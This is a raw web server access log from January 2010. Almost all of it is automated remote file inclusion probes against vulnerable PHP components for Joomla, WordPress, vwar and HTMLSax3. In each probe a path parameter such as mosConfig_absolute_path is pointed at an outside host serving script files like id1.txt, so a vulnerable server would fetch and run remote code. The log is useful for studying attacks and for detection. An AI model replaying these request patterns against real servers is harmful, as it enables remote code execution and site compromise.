67.19.194.26 - - [17/Jan/2010:02:30:08 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:30:08 -0500] "GET /logs/access_log.Q109100500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:30:08 -0500] "GET /logs/access_log.Q109080700//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:30:16 -0500] "GET /index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:30:16 -0500] "GET /logs/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:30:16 -0500] "GET /logs/error_log.Q109070400/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:30:31 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:30:33 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.125.66.66 - - [17/Jan/2010:02:30:45 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.103.72.130 - - [17/Jan/2010:02:30:47 -0500] "GET //authentication/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.103.72.130 - - [17/Jan/2010:02:30:47 -0500] "GET /logs//authentication/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.103.72.130 - - [17/Jan/2010:02:30:48 -0500] "GET /logs/error_log.Q109101200//authentication/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:30:51 -0500] "GET /logs/access_log.Q109101500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:30:52 -0500] "GET /logs/access_log.Q109101500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:02:31:16 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F32640007BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.17 - - [17/Jan/2010:02:31:24 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
77.221.130.17 - - [17/Jan/2010:02:31:24 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 34521 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
67.19.194.26 - - [17/Jan/2010:02:31:39 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:31:39 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:31:39 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:31:39 -0500] "GET /logs/access_log.Q109101500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:31:45 -0500] "GET /logs//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:31:45 -0500] "GET //setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:31:45 -0500] "GET /logs/access_log.Q109081100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:31:46 -0500] "GET /logs/access_log.Q109121000//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:31:56 -0500] "GET /logs/access_log.Q109081100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET /logs/access_log.Q109101500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:04 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:05 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:32:08 -0500] "GET /logs/access_log.Q109120300%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:10 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:10 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:32:11 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:02:32:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.37.174 - - [17/Jan/2010:02:32:47 -0500] "GET /logs/error_log.Q109120900 HTTP/1.0" 200 2650462 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.79.246.80 - - [17/Jan/2010:02:32:54 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:02:32:54 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:32:59 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:32:59 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:32:49 -0500] "GET /logs/error_log.Q109120900 HTTP/1.0" 200 2650462 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.199.105 - - [17/Jan/2010:02:33:40 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:33:40 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:33:46 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:33:46 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:33:47 -0500] "GET /logs/access_log.Q109102700%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:02:33:51 -0500] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.72.28.14 - - [17/Jan/2010:02:34:09 -0500] "GET /logs/access_log.Q109120300%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:34:14 -0500] "GET /logs/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:34:14 -0500] "GET /index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:34:14 -0500] "GET /logs/error_log.Q109070400/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:34:26 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:34:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:34:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:34:35 -0500] "GET /logs/access_log.Q109102700//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:34:42 -0500] "GET //setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:34:42 -0500] "GET /logs//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:02:34:44 -0500] "GET /logs/error_log.Q109110900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
74.223.143.131 - - [17/Jan/2010:02:34:45 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:46 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:46 -0500] "GET /logs/access_log.Q109081400%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:46 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:46 -0500] "GET /logs/access_log.Q109081400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:48 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:48 -0500] "GET /logs/access_log.Q109081400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:48 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:48 -0500] "GET /logs/access_log.Q109112800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:48 -0500] "GET /logs/access_log.Q109112800%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:49 -0500] "GET /logs/access_log.Q109112800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:52 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:54 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:54 -0500] "GET /logs/access_log.Q109081400%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:34:55 -0500] "GET /logs/access_log.Q109112800%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:34:59 -0500] "GET /logs/access_log.Q109120300//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:03 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:35:08 -0500] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
94.125.182.24 - - [17/Jan/2010:02:35:22 -0500] "GET /logs/error_log.Q109051700%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:02:35:22 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:02:35:22 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.813"
74.223.143.131 - - [17/Jan/2010:02:35:32 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:32 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:34 -0500] "GET /logs/access_log.Q109081400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:36 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:36 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:37 -0500] "GET /logs/access_log.Q109081400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:40 -0500] "GET /logs/access_log.Q109112800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:35:44 -0500] "GET /logs/access_log.Q109112800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:36:31 -0500] "GET /logs/access_log.Q109071100%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:36:31 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:36:31 -0500] "GET /logs/access_log.Q109092200%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:36:42 -0500] "GET /logs/access_log.Q109120800//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:36:42 -0500] "GET /logs//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.210.38.8 - - [17/Jan/2010:02:36:43 -0500] "GET //setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:02:37:29 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.72.28.14 - - [17/Jan/2010:02:37:54 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:37:54 -0500] "GET /logs/access_log.Q109071100%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:37:54 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:37:54 -0500] "GET /logs/access_log.Q109092200%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:38:00 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:38:01 -0500] "GET /logs/access_log.Q109071100/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:38:01 -0500] "GET /logs/access_log.Q109092200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:38:02 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
94.125.182.24 - - [17/Jan/2010:02:38:05 -0500] "GET /logs/access_log.Q109051700/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:02:38:05 -0500] "GET /logs/access_log.Q109070100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.813"
200.93.147.154 - - [17/Jan/2010:02:38:47 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:38:47 -0500] "GET /logs/access_log.Q109081800%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:38:47 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:38:47 -0500] "GET /logs/access_log.Q109081800%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:38:47 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:38:51 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:39:17 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:39:17 -0500] "GET /logs/access_log.Q109092200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:39:17 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:39:18 -0500] "GET /logs/access_log.Q109071100/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:40:15 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:40:15 -0500] "GET /logs/access_log.Q109081800//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:40:15 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:40:45 -0500] "GET /logs/access_log.Q109120300/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:40:49 -0500] "GET /logs/access_log.Q109100300/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:41:31 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:02:41:32 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
